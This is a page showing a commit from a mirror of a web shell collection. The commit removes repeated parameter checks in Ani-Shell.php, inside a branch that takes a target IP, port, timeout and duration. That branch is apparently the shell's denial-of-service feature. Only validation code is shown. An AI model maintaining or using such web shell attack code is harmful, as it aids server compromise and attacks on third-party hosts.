mirror of
https://github.com/tennc/webshell.git
synced 2025-12-06 04:41:28 +00:00
Repeated subexpressions in Ani-Shell.php
Looks like repeated expressions `isset($_GET['exTime'])` and `$_GET['exTime'] != ""` can be removed.
This commit is contained in:
@@ -1939,12 +1939,10 @@ else if(isset($_GET['dos']))
|
|||||||
isset($_GET['exTime']) &&
|
isset($_GET['exTime']) &&
|
||||||
isset($_GET['port']) &&
|
isset($_GET['port']) &&
|
||||||
isset($_GET['timeout']) &&
|
isset($_GET['timeout']) &&
|
||||||
isset($_GET['exTime']) &&
|
|
||||||
$_GET['exTime'] != "" &&
|
$_GET['exTime'] != "" &&
|
||||||
$_GET['port'] != "" &&
|
$_GET['port'] != "" &&
|
||||||
$_GET['ip'] != "" &&
|
$_GET['ip'] != "" &&
|
||||||
$_GET['timeout'] != "" &&
|
$_GET['timeout'] != ""
|
||||||
$_GET['exTime'] != ""
|
|
||||||
)
|
)
|
||||||
{
|
{
|
||||||
$IP=$_GET['ip'];
|
$IP=$_GET['ip'];
|
||||||
|
|||||||
Reference in New Issue
Block a user